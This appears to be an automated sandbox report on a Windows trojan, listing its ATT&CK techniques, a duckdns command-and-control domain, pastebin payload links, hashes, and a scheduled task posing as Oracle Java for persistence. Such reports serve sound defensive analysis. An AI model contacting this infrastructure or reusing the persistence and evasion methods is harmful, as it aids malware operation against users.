Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

Code function: 0_2_00007FF779712710 GetModuleHandleW,GetProcAddress,GetSystemTimeAsFileTime,

0_2_00007FF779712710

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	111 Windows Management Instrumentation	1 Scheduled Task/Job	112 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	131 Virtualization/Sandbox Evasion	LSASS Memory	211 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	1 DLL Side-Loading	112 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
sE5IdDeTp2.exe	40%	Virustotal		Browse
sE5IdDeTp2.exe	37%	ReversingLabs	Win64.Trojan.MintZard

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	37%	ReversingLabs	Win64.Trojan.MintZard

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://blockchainlegion.duckdns.org/api/point.php4Y	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/api/point.php9	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/api/point.php	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/api/point.phhttps://pastebin.com/raw/0UNPcCFkpolygon-rpc.com0x75	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org:80/api/point.php	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/ll	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/l	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
blockchainlegion.duckdns.org	193.233.113.77	true	true		unknown
polygon-rpc.com	173.244.207.29	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://polygon-rpc.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/0UNPcCFt	conhost.exe, 0000001B.00000002.3547859630.000002B353C05000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blockchainlegion.duckdns.org/	conhost.exe, 0000001B.00000002.3547471787.000002B353A61000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000002.3547471787.000002B3539F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/l	conhost.exe, 0000001B.00000002.3547471787.000002B353A61000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/ll	conhost.exe, 0000001B.00000002.3547471787.000002B353A61000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/api/point.php9	conhost.exe, 0000001B.00000002.3547471787.000002B353AEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/api/point.phhttps://pastebin.com/raw/0UNPcCFkpolygon-rpc.com0x75	dialer_java.exe, 0000000F.00000003.1919052720.00000172AC920000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/0UNPcCFk	dialer_java.exe, 0000000F.00000003.1919052720.00000172AC920000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmp	false		high
http://blockchainlegion.duckdns.org/api/point.php	conhost.exe, 0000001B.00000002.3547471787.000002B353AA9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/api/point.php4Y	conhost.exe, 0000001B.00000002.3547471787.000002B353AA9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org:80/api/point.php	conhost.exe, 0000001B.00000002.3547471787.000002B353A61000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://polygon-rpc.com:443/	conhost.exe, 0000001B.00000003.1932871231.000002B353A52000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000002.3547471787.000002B353A4B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000003.1932967988.000002B353A57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000003.1931997463.000002B353A52000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000003.1930710101.000002B353A51000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000003.1928785863.000002B353A51000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.233.113.77	blockchainlegion.duckdns.org	Russian Federation		20549	FREE-MPEIRU	true
173.244.207.29	polygon-rpc.com	United States		13213	UK2NET-ASGB	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589501
Start date and time:	2025-01-12 17:48:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	108
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	sE5IdDeTp2.exe renamed because original name is a hash value
Original Sample Name:	dd36f6f79e68d5e54c75527db2da97ad.exe
Detection:	MAL
Classification:	mal96.troj.expl.evad.winEXE@157/56@4/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 55% Number of executed functions: 12 Number of non-executed functions: 286
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:49:24	Task Scheduler	Run new task: Oracle Corporation path: %ProgramData%\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
173.244.207.29	https://web3resolution.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	http://debugticket.vercel.app/	Get hash	malicious	HTMLPhisher	Browse
	https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/	Get hash	malicious	Unknown	Browse
	https://metagalaxy.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	http://bridge-a3vigrfjd-pancakeswap.vercel.app/	Get hash	malicious	Unknown	Browse
	https://bafybeih5zpu7rzaoeodorqhminsbsmv3eswg6px7qixdtiwflfle6cv364.ipfs.dweb.link/	Get hash	malicious	Unknown	Browse
	http://ecometanexus.unids.com/	Get hash	malicious	Unknown	Browse
	https://simplescalingdefender.pages.dev/	Get hash	malicious	Unknown	Browse
	http://rewardsforyoutoclaim.pages.dev/	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FREE-MPEIRU	https://sora-ai-download.com/	Get hash	malicious	Unknown	Browse	193.233.112.39
	Set-up.exe	Get hash	malicious	Unknown	Browse	193.233.84.212
	XODc5nV1kC.exe	Get hash	malicious	LummaC	Browse	193.233.112.194
	BnxBRWQWhy.exe	Get hash	malicious	Stealc, Vidar	Browse	193.233.112.44
	NJna3TEAEr.exe	Get hash	malicious	Stealc, Vidar	Browse	193.233.112.44
	file.exe	Get hash	malicious	Stealc	Browse	193.233.113.184
	file.exe	Get hash	malicious	Stealc	Browse	193.233.113.184
	file.exe	Get hash	malicious	Stealc	Browse	193.233.113.184
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	193.233.113.184
UK2NET-ASGB	LbtytfWpvx.vbs	Get hash	malicious	Remcos	Browse	45.80.158.30
	BBVA S.A..vbs	Get hash	malicious	Remcos	Browse	45.80.158.30
	173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exe	Get hash	malicious	Remcos	Browse	45.80.158.30
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse	45.80.158.30
	main_m68k.elf	Get hash	malicious	Mirai	Browse	77.92.90.50
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	88.202.185.180
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	46.28.54.10
	173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.80.158.30
	Doc261124.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.80.158.30

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	NDWffRLk7z.exe	Get hash	malicious	LummaC	Browse	173.244.207.29
	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	173.244.207.29
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	173.244.207.29
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	173.244.207.29
	TBI87y49f9.exe	Get hash	malicious	LummaC	Browse	173.244.207.29
	H5JVfa61AV.exe	Get hash	malicious	LummaC	Browse	173.244.207.29
	2EG0jAmtY6.exe	Get hash	malicious	LummaC	Browse	173.244.207.29
	5vrRrFN56j.exe	Get hash	malicious	Bdaejec	Browse	173.244.207.29
	rii2.mp3.hta	Get hash	malicious	LummaC	Browse	173.244.207.29

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

Download File

Process:	C:\Users\user\Desktop\sE5IdDeTp2.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	1245320
Entropy (8bit):	6.811982830856188
Encrypted:	false
SSDEEP:	12288:2iQnVXYD4TNwzBcgXn0dE/xmiNrP64F78O9PpctLMbl0UVh4OsYX0bLDHOM5p:KNw1iS/EiNb64F78yPd+WDsYX0bLzOCp
MD5:	DD36F6F79E68D5E54C75527DB2DA97AD
SHA1:	A373E613510ADA66CEA74FFC590C25EDC59957AC
SHA-256:	3030BA393865E41FEE490205BF5873B4041275A8830D5E764693771FEC2BD35E
SHA-512:	E1F9E1C8D246FD381D5AF12C87940DF54DF9F6877BFF58ABDEA7A8D533A31A675B553D7E5BB134BB64576DE53A3C72C4E8A3E624A639C13DFA918F2A4A638FD1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...X.g.........."......~...V......@..........@.............................P............`.....................................................<....0..@.......L........(...@.................................(.......8............................................text....}.......~.................. ..`.rdata..0...........................@..@.data.......0......................@....pdata..L...........................@..@.00cfg..............................@..@.tls......... ......................@....rsrc...@....0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wumqal2.3st.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
